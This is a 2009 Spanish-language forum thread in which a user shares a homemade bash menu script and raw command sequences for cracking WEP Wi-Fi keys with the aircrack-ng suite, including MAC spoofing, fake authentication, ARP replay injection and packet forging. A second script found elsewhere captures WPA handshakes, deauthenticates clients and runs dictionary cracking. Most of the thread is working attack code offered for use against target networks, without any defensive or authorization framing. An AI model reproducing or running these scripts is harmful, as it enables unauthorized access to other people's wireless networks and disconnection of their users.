?>/script>'; } ?> Intento de un scripts Widgets Magazine

Autor Tema: Intento de un scripts  (Leído 2080 veces)

0 Usuarios y 1 Visitante están viendo este tema.

iea

  • Visitante
Intento de un scripts
« en: 14-03-2009, 23:09 (Sábado) »
Pues nada estoi, intentando hacer mi primer scripts

#!/bin/sh

#SCRIPT CREADO POR IEA

#Variables

#DECLARANDO LAS FUNCIONES

inicio ()
{
clear
unset n
cat <<INICIO

   |Escoge una opción y pulsa enter|
       
  • Leer datos de la Red a atacar e interface  #entrada_datos
  • [1] Entrada de datos de la Red #entrada_datos
       [2] Ataque 1  # ataque1
            [3] Ataque 2  # ataque2
            [4] Crakear  # crack
       [5] Escanear redes  #escanear
       [6] Ayuda
       [7] Salir
    INICIO

    read n
    if [ $n -eq 1 ]; then
    entrada_datos
    elif [ $n -eq 0 ]; then
    clear
    lee
    elif [ $n -eq 2 ]; then
    ataque1
    elif [ $n -eq 3 ]; then
    ataque2
    elif [ $n -eq 4 ]; then
    crack
    elif [ $n -eq 5 ]; then
    escanear
    elif [ $n -eq 6 ]; then
    ayuda
    elif [ $n -eq 7 ]; then
    salir
    fi
    }
    clear

    lee ()
    {
    unset m
    cat <<lee

       |Selecciona una opción y pulsa enter|
       [1] Essid
       [2] Bessid
            [3] Canal
       [4] Interface
       [5] Falsa Mac
       [6] Salir de las selecciones
    lee

    read m
    clear
    if [ $m -eq 1 ]; then
    cat <<entrada_datos
       [-]Nombre del ESSID Red a atacar
    entrada_datos
    read essid
    lee

    elif [ $m -eq 2 ]; then
    cat <<entrada_datos
       [-]" Mac del AP, a atacar, alias bssid "
    entrada_datos
    read bssid
    lee

    elif [ $m -eq 3 ]; then
    cat <<entrada_datos
       [-]Canal de la red atacada
    entrada_datos
    read canal
    lee

    elif [ $m -eq 4 ]; then
    cat <<entrada_datos
    [-]Interface atacante
    entrada_datos
    read interface
    lee

    elif [ $m -eq 5 ]; then
    cat <<entrada_datos
    [-]Mac Falsa atacante
    entrada_datos
    read mac_falsa
    lee

    elif [ $m -eq 6 ]; then
    # inicio  #BORRAR AL FINAL DE PROGRAMAR
    clear
    echo "Datos obtenidos          ==> "
    echo "Essid de red             ==> "$essid
    echo "Bssid de red            ==> "$bssid
    echo "esta en el canal        ==> "$canal
    echo "esta en el canal        ==> "$interface
    echo "Falsa mac atacante      ==> "$mac_falsa
    sleep 4
    inicio

    else
    lee

    fi
    }

    ##FUNCIÓN entrada_datos
    entrada_datos ()
    {
    clear

    cat <<entrada_datos
       [-]Nombre del ESSID Red a atacar
    entrada_datos
    read essid
    clear

    cat <<entrada_datos
       [-]Mac del AP, a atacar, alias bssid
    entrada_datos
    read bssid
    clear

    cat <<entrada_datos
       [-]Canal de la red atacada
    entrada_datos
    read canal
    clear

    cat <<entrada_datos
       [-]Interface atacante
    entrada_datos
    read interface
    clear

    cat <<entrada_datos
       [-]Mac Falsa atacante
    entrada_datos
    read mac_falsa
    clear

    clear
    echo "Datos obtenidos          ==> "
    echo "Essid de red             ==> "$essid
    echo "Bssid de red            ==> "$bssid
    echo "esta en el canal        ==> "$canal
    echo "Falsa mac atacante      ==> "$mac_falsa
    echo "Interface seleccionada  ==> "$interface
    sleep 4
    inicio
    }

    ##FUNCIÓN DESTRUIR

    destruir ()
    {
    clear
    airmon-ng stop $interface |  ifconfig $interface down  |  macchanger --mac $mac_falsa  $interface 
     xterm & airmon-ng start $interface
    sleep 2
    inicio
    }

    ##FUNCIÓN ataque1 

    ataque1 ()
    {
    clear
    airmon-ng stop $interface |  ifconfig $interface down  |  macchanger --mac $mac_falsa  $interface  | airmon-ng start $interface
    iwconfig $interface rate 1M

    xterm -hold -e airodump-ng -c $canal -w  /1 --bssid $bssid    $interface | xterm -hold -e aireplay-ng -1 6000 -o 1 -q 10 -e $essid -a $bssid -h $mac_falsa $interface | xterm -hold -e aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b $bssid -h $bssid   $interface
    #  | aircrack-ng /1-0*.cap 
    # aireplay-ng -4 -b $bssid   -h $bssid   $interface
    sleep 1
    clear
    inicio
    }

    ataque2 ()
    {
    clear
    airmon-ng stop $interface |  ifconfig $interface down | macchanger --mac $mac_falsa  $interface | airmon-ng start $interface
    iwconfig $interface rate 1M

    xterm -hold -e airodump-ng -c $canal -w  /1 --bssid $bssid    $interface |
    xterm -hold -e aireplay-ng -1 0 -e $essid -a $bssid -h $mac_falsa $interface |
    xterm -hold -e aireplay-ng -4 -b $bssid     -h $mac_falsa    $interface |
    xterm -hold -e acketforge-ng -0 -a $bssid  -h $mac_falsa -k 255.255.255.255 -l 255.255.255.255.2555 -y  replay_dec-xxxx-xxxxxx.xor -w arp-request |
    xterm -hold -e  aireplay-ng -2 -r arp-request  $interface |


    #  | aircrack-ng /1-0*.cap 
    # aireplay-ng -4 -b $bssid   -h $bssid   $interface
    sleep 1
    clear
    inicio
    }

    ##FUNCIÓN AYUDA

    ayuda ()
    {
    clear
    unset volver_ayuda
    cat <<AYUDA
        ======================
       |         AYUDA       |
        ======================
            Goglea un poco y aprrende
       U pon Find *.sh en / y lee mas
       [1] Volver Atrás (al menú principal)
    AYUDA
    read volver_ayuda
    if [ $volver_ayuda -eq 1 ]; then
    inicio
    fi
    }

    ##FUNCION SALIR

    salir ()
    {
    clear
    cat <<SALIR
       =====================================
       | GRACIAS POR UTILIZAR ESTE PROGRAMA |
       | AUTOR: iea                         |
       | Hasta pronto                       |           
       |                             .      |
       =====================================

    SALIR
    sleep 0
    exit
    }

    ##ESCANEAR REDES bg?

    escanear ()
    {
    clear
    interface=wlan0    #recordar quitar cuando este terminado
    mac_falsa=00:11:22:33:44:55

    macchanger -m $mac_falsa  $interface
    airodump-ng  $interface 
    ##  xterm -hold -e airodump-ng  $interface  |  no se xp coño no funciona en otra terminal
    sleep 4
    clear
    inicio
    }
    ##FUNCIÓN CRACK

    crack ()
    {
    clear
    aircrack-ng /1-0*.cap 
    sleep 2
    inicio
    }
    #INICIO DEL SCRIPT

    inicio

« Última modificación: 14-03-2009, 23:11 (Sábado) por iea »

iea

  • Visitante
Re: Intento de un scripts
« Respuesta #1 en: 14-03-2009, 23:33 (Sábado) »
Es el primero,bach que hago y para no tener ni idea, y hacer un corta y pega de aqui y otro de alli, pues eso ya veis....

 Contras el segundo ataque no me funciona xp esta a medio programar, faltan por declacar funciones de los nombre de ficheros.. para el pakeforge...

Una cosa buena q he incluido, que se puede seleccionar la mac del atacante...
Hay dos formas de meter los datos de la red a estudiar...
Otra cosa buena es que cada vez, que se ataca, se auto configura la interface...y su mac.
El ataque uno rula..

Lo malo que al escanear redes, no soy quien a hacer que se abra en otro terminal...con las redes disponibles...(para poderlo cortar y pegar, pero me conformo con verlo)


Resumiendo mi umilde intencion es meter, estas dos retailas, + o - en un sh pero que lea las variables que yo le meta...

Lo que me preocupa es el funcionamiento de xterm -hold -e que no encuentro ej de como funciona y es la clave para los ataque en distintas terminales, el comando konsola no es bueno xp siempre se cierra y este no...

************************************************
ifconfig wlan1 192.168.1.55
route add default gateway 192.168.1.1 wlan1
# airodump-ng wlan1       
airmon-ng stop wlan1 && ifconfig wlan1 down  && macchanger --mac 00:0e:wlan1  && airmon-ng start wlan1

iwconfig wlan1 rate 1M
airodump-ng -c 5 -w  /WLAN_25 --bssid 00:01:    wlan1
aireplay-ng -1 6000 -o 1 -q 10 -e W5 -a 00:01:38   -h 00:0e:3  wlan1
aireplay-ng -2 -p 0841 -c  ff:ff:ff:ff:ff:ff -b 00:02:  -h 00:0e: wlan1 
aircrack-ng /W-0*.cap         por defecto e lo root
ver mac filtrado aireplay-ng -4 -b 00:02:cf    -h 00:0e: wlan1

****************************2
airmon-ng stop wlan1 
ifconfig wlan1 down
macchanger --mac 00:11:22:33:44:55 wlan1
airmon-ng start wlan1
#airodump-ng wlan1       ver lo que hay
iwconfig wlan1 rate 1M
airodump-ng -c 6 -w  /J --bssid 00:11:F5:  wlan1
aireplay-ng -1 0 -e J -a 00:01:3 -h 00:16:   wlan1
aireplay-ng -4 -b 00:15::   -h 00:11:22:33:44:55    wlan1
packetforge-ng -0 -a 00:11:F5:  -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.2555 -y  replay_dec-xxxx-xxxxxx.xor -w arp-request
aireplay-ng -2 -r arp-request wlan0
aircrack-ng -n 64 -z -f 1 -e J -b 00:11:F5 /J-0*.cap

***********************************
Bueno si alguno lo quiere mirar y dar ideas, seran bien dadas..
Pero el que me quiera ayudar que ponga ejemplos xp como dije no tengo ni mucha ni si poca idea...
Gracias
javascript:replaceText(' >:(', document.forms.postmodify.message)
agradecido

« Última modificación: 14-03-2009, 23:47 (Sábado) por iea »

iea

  • Visitante
Re: Intento de un scripts
« Respuesta #2 en: 14-03-2009, 23:44 (Sábado) »
Bueno aunque tenga poco que ver con mi pos hos cuento he encontrado esto:
#!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x <ka0x01[at]gmail.com>

if [ $UID != 0 ]; then
   echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
   exit
fi

comprueba_mac(){
   if [ ! "${#1}" -eq "17" ]; then
      echo -e "\033[31mMac Incorrecta\n\033[0m"
      exit
   fi
}
interfaces() {
   echo -e "\n\033[31m
  • Seleccione la interfaz que va a utilizar: \033[0m\n"

   INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
   select INTER in $INTERFACES; do
      break;
   done
   clear
}

monitor(){
   airmon-ng start $INTER
   clear
   menu
}

handshake(){
   clear
   read -p "[-] Introduzca la MAC del AP: " mac_ap
   comprueba_mac $mac_ap
   read -p "[-] Introduzca la MAC del Cliente: " mac_client
   comprueba_mac $mac_client
   read -p "[-] Introduzca el canal del AP: " mac_chanel
   read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
   xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
   clear
   read -p "[-] Introduzca la MAC del AP: " mac_ap
   comprueba_mac $mac_ap
   read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
   comprueba_mac $mac_cliente
   read -p "[-] Introduzca el numero de desautenticaciones: " num
   xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
   clear
   menu
}

crack_dicc(){
   clear
   read -p "[-] Introduzca la ruta del diccionario: " diccionario
   echo "[-] Seleccione el archivo de datos capturados:"

   LS_DIR=$(ls *.cap)
   select DATA in $LS_DIR; do
      break;
   done
   
   xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
   menu
}

menu(){
   echo -e "\n
  • Opciones:\n"

   echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
   echo "1 - Activar Modo Monitor"
   echo "2 - Capturar handshake"
   echo "3 - Desautenticar cliente"
   echo "4 - Obtener clave con diccionario"
   echo "5 - Salir"
   echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

   read -p "opcion> " OPCION

   case $OPCION in
      "1") monitor;;
      "2") handshake;;
      "3") desautenticacion;;
      "4") crack_dicc;;
      "5") exit;;
   *) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

   esac
}

interfaces
menu

# __EOF__

Que me ha dejado acojonado puesto que estas lines + o - hace lo que yo hice...
Me refiero a la declaracion de variables y dos ataques...
Pero yo logicamente quiero tirar por el mio, mas que nada xq veo mejor el codigo...y este no me gusta que tengas que remeter, bsid,esid....


Desconectado drvalium

  • *******
  • Mensajes: 17370
  • Misántropo
Re: Intento de un scripts
« Respuesta #3 en: 19-03-2009, 02:42 (Jueves) »
joder, me voy unos días y aquí se pone la gente a hacer scripts, muy bueno iea, tu sigue con tu plan >:(


a la que tenga un rato pruebo esto que has hecho y lo critico hasta la muerte ;D ;D ;D


un saludo ;)